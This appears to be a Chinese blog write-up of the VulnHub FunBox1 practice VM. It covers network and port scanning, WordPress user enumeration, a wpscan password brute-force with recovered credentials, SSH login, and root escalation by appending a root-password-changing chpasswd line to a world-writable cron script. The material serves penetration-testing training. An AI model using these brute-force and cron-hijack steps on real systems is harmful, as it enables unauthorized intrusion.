靶机渗透练习22-FunBox1

靶机描述

靶机地址:https://www.vulnhub.com/entry/funbox-1,518/

Description

Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min.

This VM is created/tested with Virtualbox. Maybe it works with vmware.

If you need hints, call me on twitter: @0815R2d2

Have fun...

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.7

靶机

IP地址:192.168.9.40

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

☁  FunBox  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:47:56:4d       PCS Systemtechnik GmbH
192.168.9.12    0a:00:27:00:00:03       (Unknown: locally administered)
192.168.9.40    08:00:27:cf:29:18       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

☁  FunBox  nmap -A -sV -T4 -p- 192.168.9.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 11:25 CST
Nmap scan report for bogon (192.168.9.40)
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
|   256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_  256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry 
|_/secret/
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=2/25%Time=62184C2D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:CF:29:18 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms bogon (192.168.9.40)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds

21---ftp---ProFTPD

22---ssh---OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80---http---Apache httpd 2.4.41 ((Ubuntu))

33060---mysqlx?

2.2枚举漏洞

21 端口分析

image-20220225112751955

22 端口分析

一般只能暴力破解,暂时没有合适的字典

80 端口分析

访问 :http://192.168.9.40

image-20220225113122510

发现,会自动跳转到http://funbox.fritz.box/

添加/etc/hosts:192.168.9.40 funbox.fritz.box

访问:http://funbox.fritz.box/

image-20220225141201685

简单看了下,发现该站是WordPress

扫描一下目录:gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

☁  FunBox  gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://funbox.fritz.box/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,zip,bak,txt,php
[+] Timeout:                 10s
===============================================================
2022/02/25 14:13:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta.html            (Status: 403) [Size: 281]
/.hta.zip             (Status: 403) [Size: 281]
/.hta                 (Status: 403) [Size: 281]
/.hta.bak             (Status: 403) [Size: 281]
/.hta.txt             (Status: 403) [Size: 281]
/.hta.php             (Status: 403) [Size: 281]
/.htaccess            (Status: 403) [Size: 281]
/.htaccess.zip        (Status: 403) [Size: 281]
/.htaccess.bak        (Status: 403) [Size: 281]
/.htpasswd            (Status: 403) [Size: 281]
/.htaccess.txt        (Status: 403) [Size: 281]
/.htpasswd.php        (Status: 403) [Size: 281]
/.htpasswd.html       (Status: 403) [Size: 281]
/.htaccess.php        (Status: 403) [Size: 281]
/.htaccess.html       (Status: 403) [Size: 281]
/.htpasswd.zip        (Status: 403) [Size: 281]
/.htpasswd.bak        (Status: 403) [Size: 281]
/.htpasswd.txt        (Status: 403) [Size: 281]
/index.php            (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/index.php            (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/license.txt          (Status: 200) [Size: 19915]                           
/readme.html          (Status: 200) [Size: 7278]                            
/robots.txt           (Status: 200) [Size: 19]                              
/robots.txt           (Status: 200) [Size: 19]                              
/secret               (Status: 301) [Size: 321] [--> http://funbox.fritz.box/secret/]
/server-status        (Status: 403) [Size: 281]                                      
/wp-admin             (Status: 301) [Size: 323] [--> http://funbox.fritz.box/wp-admin/]
/wp-content           (Status: 301) [Size: 325] [--> http://funbox.fritz.box/wp-content/]
/wp-includes          (Status: 301) [Size: 326] [--> http://funbox.fritz.box/wp-includes/]
/wp-settings.php      (Status: 500) [Size: 0]                                             
/wp-config.php        (Status: 200) [Size: 0]                                             
/wp-links-opml.php    (Status: 200) [Size: 221]                                           
/wp-mail.php          (Status: 403) [Size: 2709]                                          
/wp-blog-header.php   (Status: 200) [Size: 0]                                             
/wp-login.php         (Status: 200) [Size: 4502]                                          
/wp-cron.php          (Status: 200) [Size: 0]                                             
/wp-load.php          (Status: 200) [Size: 0]                                             
/wp-signup.php        (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/wp-trackback.php     (Status: 200) [Size: 135]                                                         
/xmlrpc.php           (Status: 405) [Size: 42]                                                          
/xmlrpc.php           (Status: 405) [Size: 42]                                                                                             
===============================================================
2022/02/25 14:13:54 Finished
===============================================================

访问:http://funbox.fritz.box/robots.txt

image-20220225141527982

发现一个目录

访问:http://funbox.fritz.box/secret/

image-20220225141603364

其他的倒是没什么发现

2.3漏洞利用

2.3.1 使用wpscan扫描网站获取账号密码

使用wpscan枚举用户信息

wpscan --url http://funbox.fritz.box/ -e

image-20220225141920318

发现有两个用户adminjoe

使用wpscan枚举密码

wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt

image-20220225142131135

得到密码joe / 12345admin / iubire

2.3.2 使用账号密码获取shell

尝试网站登陆,没有发现什么问题
尝试SSH登陆,ssh joe@192.168.9.40

image-20220225142315263

成功登录

joe@funbox:~$ id
uid=1001(joe) gid=1001(joe) groups=1001(joe)
joe@funbox:~$ sudo -l
[sudo] password for joe: 
Sorry, user joe may not run sudo on funbox.

2.4权限提升

2.4.1 信息收集

查看用户文件夹

joe@funbox:~$ ls -al /home
total 16
drwxr-xr-x  4 root  root  4096 Jun 19  2020 .
drwxr-xr-x 20 root  root  4096 Jun 19  2020 ..
drwxr-xr-x  3 funny funny 4096 Jul 18  2020 funny
drwxr-xr-x  5 joe   joe   4096 Jul 18  2020 joe
joe@funbox:~$ ls -al /home/funny
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18  2020 .
drwxr-xr-x 4 root  root      4096 Jun 19  2020 ..
-rwxrwxrwx 1 funny funny       55 Jul 18  2020 .backup.sh
-rw------- 1 funny funny     1462 Jul 18  2020 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19  2020 .cache
-rw-rw-r-- 1 funny funny 48701440 Feb 25 03:52 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19  2020 .reminder.sh
-rw-rw-r-- 1 funny funny       74 Jun 19  2020 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19  2020 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18  2020 .viminfo
joe@funbox:~$ ls -al /home/joe
total 56
drwxr-xr-x 5 joe  joe  4096 Jul 18  2020 .
drwxr-xr-x 4 root root 4096 Jun 19  2020 ..
-rw------- 1 joe  joe  1141 Jul 18  2020 .bash_history
-rw-r--r-- 1 joe  joe   220 Jun 19  2020 .bash_logout
-rw-r--r-- 1 joe  joe  3771 Jun 19  2020 .bashrc
drwx------ 2 joe  joe  4096 Jun 19  2020 .cache
drwxrwxr-x 3 joe  joe  4096 Jul 18  2020 .local
-rw------- 1 joe  joe   998 Jul 18  2020 mbox
-rw------- 1 joe  joe   260 Jun 22  2020 .mysql_history
-rw-r--r-- 1 joe  joe   807 Jun 19  2020 .profile
drwx------ 2 joe  joe  4096 Jun 22  2020 .ssh
-rw------- 1 joe  joe  9549 Jul 18  2020 .viminfo

发现funny用户文件夹有几个敏感文件:.backup.sh.reminder.shhtml.tar
查看这几个文件

joe@funbox:~$ cat /home/funny/.backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:~$ cat /home/funny/.reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

joe@funbox:~$ 

可以看到两个脚本,都是root权限运行,一个是备份网站,一个是发mail
上传一个pspy64程序,监视程序运行

joe@funbox:~$ cd /tmp
-rbash: cd: restricted
joe@funbox:~$ ls
mbox
joe@funbox:~$ bash
joe@funbox:~$ cd /tmp
joe@funbox:/tmp$ wget http://192.168.9.7/pspy64
--2022-02-25 03:56:39--  http://192.168.9.7/pspy64
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                      100%[=========================================================================================>]   2.94M  --.-KB/s    in 0.03s   

2022-02-25 03:56:39 (116 MB/s) - ‘pspy64’ saved [3078592/3078592]

joe@funbox:/tmp$ 

开启监控

image-20220225143545808

可以看到.backup.sh会每两分钟执行一次,只需修改脚本执行提权代码即可

2.4.2 权限提升

将以下代码追加到.backup.sh脚本中

完整执行过程

joe@funbox:/home/funny$ vim .backup.sh
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
echo 'root:test' | sudo chpasswd
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:/home/funny$ 

等一下

joe@funbox:/home/funny# su root
Password: 
bash: _parse_usage: line 16: syntax error near unexpected token `('
bash: _parse_usage: line 16: ` -?(\[)+([a-zA-Z0-9?]))'
bash: error importing function definition for `_parse_usage'
bash: _longopt: line 6: syntax error near unexpected token `('
bash: _longopt: line 6: ` --!(no-*)dir*)'
bash: error importing function definition for `_longopt'
root@funbox:/home/funny# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:/home/funny# cd /root
root@funbox:~# ls -al
total 64
drwx------  6 root root 4096 Jul 18  2020 .
drwxr-xr-x 20 root root 4096 Jun 19  2020 ..
-rw-------  1 root root 2109 Jul 18  2020 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Jun 19  2020 .cache
drwx------  3 root root 4096 Jun 19  2020 .config
-rw-r--r--  1 root root   49 Jul 18  2020 flag.txt
-rw-------  1 root root  779 Jun 19  2020 mbox
-rw-------  1 root root  200 Jun 19  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   74 Jun 19  2020 .selected_editor
drwxr-xr-x  3 root root 4096 Jun 19  2020 snap
drwx------  2 root root 4096 Jun 19  2020 .ssh
-rw-------  1 root root 8924 Jul 18  2020 .viminfo
root@funbox:~# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~# 

成功提权,并拿到flag

总结

本节通过信息收集目录扫描获取敏感目录,利用wpscan进行网站扫描获取账号密码,使用账号密码登陆
SSH,利用计划任务脚本提权

  1. 发现主机
  2. 端口扫描
  3. 目录扫描
  4. wpspcan扫描
  5. 计划任务提权
posted @ 2022-04-02 16:11  hirak0  阅读(305)  评论(0编辑  收藏  举报